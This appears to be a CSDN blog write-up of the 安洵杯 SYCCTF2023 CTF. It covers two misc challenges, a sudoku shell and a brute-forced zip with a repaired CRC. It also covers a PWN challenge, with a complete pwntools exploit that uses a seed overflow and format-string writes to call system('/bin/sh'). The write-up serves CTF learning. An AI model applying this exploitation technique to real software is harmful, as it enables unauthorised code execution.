安洵杯 SYCCTF2023 部分misc PWN wp

最新推荐文章于 2023-12-25 21:08:07 发布
最新推荐文章于 2023-12-25 21:08:07 发布
阅读量247 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51890658/article/details/131196263
版权

一.MISC

1.sudoku_easy

一道简单的数独题,nc连接起让你输入,提示输入1开始数独,2退出,3帮助

输入1进入数独游戏,如果获得分数达到120可获得shell,拿到flag

通过它的提示输入值越少,数独越简单,获得的分数越少

输入值越大,数独越难,获得分数越高

通过分析后,发现输入值很大时,数独就会全为0,然后随意输入一个数独进去后可拿到120的分数

获取shell,flag就出来了

2.烦人的压缩包

一个加密的压缩包,通过ARCHPR爆破出密码,密码为645321 

解压出来后发现hint.txt没用,分析下love.jpg 16进制编辑打开存在一个压缩包

在kali中用binwalk把它dump出来,虽然没密码,但CRC报错无法解压出flag.txt

 

修复压缩包的CRC,然后解压flag.txt,发现是ook!加密

 

 

通过:Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org] 在线解密ook获得flag

 

       二.PWN

1.harde_pwn

64位的,relro全开,无法修改got表,拖入ida看,程序流程很简单,fuxk_game()函数存在随机值,但有4字节的溢出

可修改seed的低4字节为1可达到随机值固定及可绕过

 进入heap_fmt()函数,是个无限循环,存在格式化字符串漏洞

通过格式化字符串漏洞先泄露出程序地址和libc地址,然后用格式化字符串漏洞修改栈地址的值为pop_rdi,sh,system,最后修改printf的返回地址及getshell

exp: 

from pwn import *
from LibcSearcher import *
from pwnlib import *
import base64
#context.arch="amd64"
#sh=remote("139.155.132.59",9999)
sh=process("./harde_pwn")
elf=ELF("./harde_pwn")
#libc=ELF("libc.so.6")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]
inter=lambda :sh.interactive()

def add(k,lenth,data):
    un("option: ")
    sl("b")
    un("bye: ")
    sl(k)
    un(": ")
    sl(lenth)
    un(": ")
    sl(data)


def fun(data):
    un("data ;)\n")
    sd(data)

un("game!\n")
sd("a"*0x1c+p32(1))
#pwnlib.gdb.attach(sh)

num = [1804289348,846930915,1681692750,1714636888,1957747830,424238300,719885423,1649760457,596516622,1189641450,1025202335,1350490000,783368663,1102520032,2044897736,1967513955,1365180505,1540383463,304089201,1303455709,35005248]
for i in num:
    un("input: \n")
    sl(str(i))

un("data ;)\n")

#pwnlib.gdb.attach(sh)

sd("%6$p%9$p%11$p")
stack=int(rv(14),16)+24
d=stack&0xffff
cxjz=int(rv(14),16)-0x1543
jz=int(rv(14),16)-libc.sym['__libc_start_main']-240
print hex(jz)
print hex(stack)

shell=jz+libc.sym['system']
bin_sh=jz+libc.search("/bin/sh").next()

a1=(bin_sh&0xffff00000000)/0x100000000
a2=(bin_sh&0xffff0000)/0x10000
a3=bin_sh&0xffff

a=(shell&0xffff0000)/0x10000
b=shell&0xffff
print hex(a)
print hex(b)
print hex(shell)
print hex(a1)
print hex(a2)
print hex(a3)
print hex(bin_sh)
k=0x15B3#15AE

fun("%"+str(d)+"c%6$hn")
fun("%"+str(b)+"c%8$hn")
fun("%"+str(d+2)+"c%6$hn")
fun("%"+str(a)+"c%8$hn")

#pwnlib.gdb.attach(sh)
stack1=stack-0x10
d=stack1&0xffff
fun("%"+str(d)+"c%6$hn")
fun("%"+str(k)+"c%8$hn")

stack1=stack-0x8
d=stack1&0xffff
fun("%"+str(d)+"c%6$hn")
fun("%"+str(a3)+"c%8$hn")

fun("%"+str(d+2)+"c%6$hn")
fun("%"+str(a2)+"c%8$hn")

fun("%"+str(d+4)+"c%6$hn")
fun("%"+str(a1)+"c%8$hn")

stack1=stack-0x30
d=stack1&0xffff
print hex(d)
fun("%"+str(d)+"c%6$hn")
fun("%"+str(0x15ae)+"c%8$hn\x00")

inter()
 

Binary..
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
掘安wp分析文件
04-10
根据官方wp复现 和自己参赛记录整理记录的IDA分析文件
安洵2023misi部分wp
mr_xioabai的博客
06-11 188
之后拿到shell,直接cat /flag。
2023年第六届安洵网络安全挑战赛|MISC
zerorzeror的博客
12-25 1151
解压缩有3个文件,文件名“麦克斯的称号”,是文本文件,添加txt后缀,发现0宽字符。在线解0宽,获取隐藏文字。文本文件往下拉,发现提示信息。解压缩“嗨.zip",出现docx文件,改后缀名为zip,解压缩,发现文件,文件最后有一个特殊字符串,扔进工具分析。rot循环减4,发现提示,根据前面提示,写脚本生成密码字典。生成100多万组密码。爆破解压缩密码,解压缩得到flag。
2023安洵MISC复现
最新发布
xxfsa的博客
12-25 950
回头看flag3.txt看着像是AES加密,题目描述说某个重要的表被更改了。网易云和QQ音乐应该都没有直接能搜到这首歌的办法,但我们可以找个歌单开搜。我用kali的qsstv一直显示format not support。d@@Coong_LiiKEE_F0r3NsIc作为密钥AES解密。do_you_want_listen.txt内容为。检索'mp3'没东西,检索'wav'有一大串。检索'rar'看到secret.rar。windows用vol3。先检索一下'flag'再检索一下'txt'
2023第六届安洵wp
ZJPC007的博客
12-24 1641
打了十几个小时,唯一的感觉就是难,难,难下面只分享一下我们做的题目的wp,能力有限,有不对的地方请各位师傅指出。1.sub_4577E0函数主要函数都写在注释里面,获取输入长度,根据长度分配堆空间,将密文赋值,关键加密和比较等2.sub_45126F函数分析,sub_4521B5函数的作用:此函数使用输入的user对两段数据进行一个操作,后续这个 51c048 和 51c000会对输入加密,由于这个函数只有用户名输入正确就行没啥好分析的。
ctfpwn题目总结
weixin_41038905的博客
11-16 4648
1.安装 pip install pwntools (python2) pip3 install pwntools (python3) 2.使用 Context设置 context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd
2022第三届网鼎白虎组misc830原题附件
09-03
2022第三届网鼎白虎组misc830原题附件
2023羊城 DASCTF EZ-Misc
09-03
2023羊城 DASCTF EZ-Misc
红帽wp红帽wp
05-06
红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp
攻防世界miss-01,杂项misc太湖
11-01
攻防世界miss_01,杂项misc太湖。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127630023
安洵2023 web wp
m0_64348326的博客
06-11 475
4.当时做到这里,就想着如何提权root用户了,但是发现提供的mysql并不足以能够提权。5.进入界面看是个xml文档,一眼xml注入,直接抓get包到repeat,然后在下面添加payload,file访问页面flag即可。(因为写其他地方的话,无法访问,测试后发现只有当前页面可以,game.php也不行)。目录,发现pyc文件,该文件是python解释器将py文件编译后生成的字节码文件。,提示get传递cmd参数,查看页面列表,类似于根目录的情况。界面,提示要登陆,打开session解密一看,
2023安洵第六届网络安全挑战赛 WP
渗透测试研究中心
12-25 376
首先通过附件帐号信件获取到帐号通过base64或者jsfuck可获取提示js和c,审计一下js那么可以看到c函数,运行一下。获取到 github 项目地址查找提交历史我们发现了源码审计源码发现为 可能存在spring–boot 未授权绕过在admin的页面下的/post_message/接口存在fastjson解析查看具体版本发现无法直接ladp攻击,查看依赖发现引入了shiro。
2023“安洵”网络安全挑战赛wp
qq_63923205的博客
12-23 741
团队wp,本人做了2题密码和misc
2023安洵web_wp
q1415500189的博客
03-01 422
2023安洵web_wp
安洵2023wp - ukfc战队
qq_59700927的博客
06-11 1804
2. 根据消息头 "Server: Werkzeug/1.0.1 Python/3.11.3"、 "/eval"回显是列表格式等判断是 "python flask", 且 "/eval" 使用了 "os.listdir()"函数,5.再看 "/sEcR@[email protected]" 传空参可以得到两个函数 "mysqli_query()" 和 "mysqli_fetch_all()", 试着写马传了一下, 然后sql日志写马。file=../app.py" 均被 "杂鱼"
第五届安洵网络挑战赛WP
http://www.lunatic007.top/
11-28 1037
第五届安洵网络挑战赛WP
2023安洵全国精英赛SYCTF-烦人的压缩包【MISC
soysauce123的博客
06-11 428
计算机是很nb的我们可以在很短的时间内就把他爆破出来,有同学可能在想为啥这里我只选择了数字,对我来说就是边猜边试嘛,没思路的时候就是要多试一下,不是啥一下子就可以得出来的。打开后会发现文件夹损坏了,我们需要修复,这里在我们尝试多次后发现了这是压缩方式出现了问题,这里我们可以继续打开他的十六进制进行修改。在打开时的时候我们会发现需要密码,那么很明显题目并没有给到我们其他的其实,我们的建议是直接用工具爆破,上工具!这里有一个压缩方式一个解压方式,保险起见我们两个都修改一下是最好的,都是08 00。
安洵SYCTF2023misc方向wp
toto的博客
06-10 927
一开始以为每次获得5分,要拿到120分,range了24次,一直出问题,后来发现获得分数是递增的,同时调试了一下发现拿到120分会返回一个getshell,因此修改一下range7次。这里我为方便采用了在每一行右移填补到最后之后,往下再重新左移到最左边,再开始下一行的右移填补,而不是用左移填补导致需要倒着索引,略微增加了时间复杂度。在测试过程中发现在一定位置挂上notch之后,可以读到很清晰的后半边的二维码,左半边变得更加模糊了,但却更加清晰的显示出背景图,明显就是轨道3的图。
2023安洵-秦岭防御军wp
抚琴
12-24 1256
秦岭防御军
2023蓝帽初赛misc下载
12-04
2023蓝帽初赛misc下载是指在2023年举办的蓝帽网络安全竞赛中的一项miscellaneous(杂项)类题目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的题目文件或资源,并进行分析和解决。 首先,参赛选手...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值